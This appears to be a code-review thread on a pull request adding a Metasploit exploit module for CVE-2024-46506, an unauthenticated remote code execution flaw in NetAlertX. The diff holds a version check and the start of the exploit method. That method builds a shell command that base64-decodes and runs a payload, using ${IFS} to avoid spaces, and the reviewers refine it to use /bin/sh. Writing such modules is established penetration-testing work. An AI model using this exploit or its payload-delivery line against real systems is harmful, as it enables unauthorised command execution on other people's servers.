modules/exploits/linux/http/netalertx_rce_cve_2024_46506.rb

```diff
@@ -0,0 +1,155 @@
+        'Description' => %q{
+          An attacker can update NetAlertX settings with no authentication, which results in RCE.
+        },
+        'Author' => [
+          'Chebuya (Rhino Security Labs)', # Vulnerability discovery and PoC
+          'Takahiro Yokoyama' # Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2024-46506'],
+          ['URL', 'https://rhinosecuritylabs.com/research/cve-2024-46506-rce-in-netalertx/'],
+          # ['URL', 'https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2024-46506'], Not published (yet?)
+        ],
+        'DefaultOptions' => {
+          'FETCH_DELETE' => true,
+          'WfsDelay' => 150
+        },
+        'Platform' => %w[linux],
+        'Targets' => [
+          [
+            'Linux Command', {
+              'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd
+            }
+          ],
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2025-01-30',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'SideEffects' => [ CONFIG_CHANGES, ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION, ]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(20211),
+        OptInt.new('WAIT', [ true, 'Wait time (seconds) for the payload to be set', 75 ]),
+        OptBool.new('CLEANUP', [false, 'Restore DBCLNP_CMD to original value after execution', true])
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'maintenance.php')
+    })
+    return Exploit::CheckCode::Unknown unless res&.code == 200
+
+    html_document = res&.get_html_document
+    return Exploit::CheckCode::Unknown('Failed to get html document.') unless html_document
+
+    version_element = html_document.xpath('//div[text()="Installed version"]//following-sibling::*')
+    return Exploit::CheckCode::Unknown('Failed to get version element.') unless version_element
+
+    version = Rex::Version.new(version_element.text&.strip&.sub(/^v/, ''))
+    return Exploit::CheckCode::Unknown('Failed to detect version.') unless version
+
+    return Exploit::CheckCode::Safe("Version #{version} detected, which is not vulnerable.") unless version.between?(Rex::Version.new('23.01.14'), Rex::Version.new('24.9.12'))
+
+    Exploit::CheckCode::Appears("Version #{version} detected.")
+  end
+
+  def exploit
+    # Command is splitted by the space, and processed by the below Python code
+    # subprocess.check_output(command, universal_newlines=True, stderr=subprocess.STDOUT, timeout=(set_RUN_TIMEOUT))
+    # https://github.com/jokob-sk/NetAlertX/blob/v24.9.12/server/plugin.py#L206
+    # https://github.com/jokob-sk/NetAlertX/blob/v24.9.12/server/plugin.py#L214
+    cmd = "/bin/bash -c echo${IFS}#{Rex::Text.encode_base64(payload.encoded)}|base64${IFS}-d|/bin/bash"
```

Comment:
```suggestion
    cmd = "/bin/sh -c echo${IFS}#{Rex::Text.encode_base64(payload.encoded)}|base64${IFS}-d|/bin/sh"
```

Smaller payload (yay!), and more portable, and not every Linux system has `bash` installed.

Reply:
Thanks! Updated to use `sh`. https://github.com/rapid7/metasploit-framework/pull/19868/commits/edbdb985e39d7c1a10629ea5ea2711d9222ad5d5

Updated to use BadChars. https://github.com/rapid7/metasploit-framework/pull/19868/commits/2db7f4f1869e5b29d528755b5dceb4d681155383 Seems like only `base64 -d` works fine. Without `/bin/sh -c`, the payload fails. Thanks!
![image](https://github.com/user-attachments/assets/de12a1fe-6e24-4dd3-8b67-c7b588d59321)